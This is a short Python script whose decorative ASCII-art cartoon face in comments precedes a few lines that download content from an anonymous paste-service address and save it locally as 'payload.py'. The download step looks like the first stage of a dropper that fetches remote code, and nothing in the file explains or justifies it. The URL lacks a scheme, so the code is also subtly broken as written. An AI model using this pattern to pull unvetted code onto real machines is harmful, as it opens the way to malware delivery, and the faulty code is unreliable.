#
# *********************************S&@$%****%$@@&S********************************
# ****************************S@%*::.............:!%@#****************************
# **********************SSSS@*:......................:!$#*************************
# ******************S&@@&@%:............................:%#***********************
# *****************#$$@@%:.........................:::::..%#S*********************
# *****************&@@$!.....................:::::::::::.!&@@@&&S*****************
# *****************&&%...................::::::::::......:@@@@@$$@#***************
# *****************#$.....................................$&@@@@@$$S**************
# *****************@......................................!&@@@@@@@***************
# ****************S!....:**:...............................%&@@@@@S***************
# ****************$.:..%#$*@!.::....::............:**!.....:@&@@&#****************
# ****************!...%S#:.@&....!*%$$$%%*!.....:$#$*&$.....:$&&#*****************
# ****************!...@S#&&#&:.:$@$$$$$$$$@%!...$S&:.%S*......*%%*****************
# ***************S:...$S##SS&..@@$%%%%%$$$$$@:.:#S#&@#S@........%*****************
# *****************...:&####!..@@@$$$$$$$$@@&!.:#S#SS#S$......:!@*****************
# ****************&::..:*%%:...:$&&@@@@@@@&@*...*####S&:...::!**S*****************
# *****************$!::!...!.....!*%$$@@$$*:.....!%@@%:.::!!***@******************
# ******************$*!!!!::........:!!:.........::::!!!!*****$*******************
# *******************@***%*!!!!::!!!!!!!*!::::::!************$S*******************
# ********************#%*********%%***!**%%%********%*******@*********************
# *********************&@$**%%%%%%****************%$$$$$%*$#**********************
# ********************@%$@@@$$$$$@$%******%$$$$%%$@$$$$$$@************************
# ********************@%$$$$$$$$$$$@*****$@$$$$$@@$$$$$$%%#***********************
# *********************&$$$$$$$$$$$@@$%%%&$$$$$$$$$$$$$%**S***********************
# *****************S#&@%*%@$%$$$$$$$$$$$$@$$$$$$$%*!!!*%$#************************
# **********#&@$%*!:.....*%**%%%%%%%$$$$$$$$@$*:........%*************************
# *********&............:%****************$%!..........:!#************************
# **********%..........:%******%%%%%%**%%$*..........:!*$*************************
# ***********#$%!::....%%****%%*%::::::!$@.......::!!*$@**************************
# ****************S#&&@%****$*:*!::::::*!%!!!!!*%%%%$$%$**************************
# ********************#****$!::%::::::!*::!!%$%%%*******#****SSS##SS**************
# ********************@****$!::%::::::%!:::::%**********&*SS#&&&&&&&&#S***********
# ********************%*****%*!%!:::::%!::::!$********%%&######&&&&&&&&&**********
# ********************@%%*****%$$:::::*$!*%%%******%%$$$@########&&&&&&&S*********
# ********************#$$$%%%%%$*:::::!%@%%**%%%%%$$$$$$&#########&&##S***********
# *********************@$$$$$$$$$$%****%@$$$$$$$$$$$$$$@########SSS***************
# **********************@$$$$$$$$$$@@@@@$$$$$$$$$$$$$$@##SSS**********************
# ***********************#$$$$$$$$$$$$$$$$$$$$$$$$$$$@S***************************
# *************************#@$$$$$$$$$$$$$$$$$$$$$$@#*****************************
# *************************S##&&@@$$$$$$$$$$$$$$@&##SS****************************
# **********************S#########*SS########S######&&#S**************************
# *********************#&&&&&&&&&S*************&&&&&&&&&#*************************
# ********************&$@&@@&&@@#**************#@@&&@@&&@@S***********************
# *********************S*SSSSSS*****************#&@#&&&###S************************
import requests

url = 'termbin.com/8aan'

r = requests.get(url)

filename = 'payload.py'
with open(filename, 'wb') as output_file:
    output_file.write(r.content)



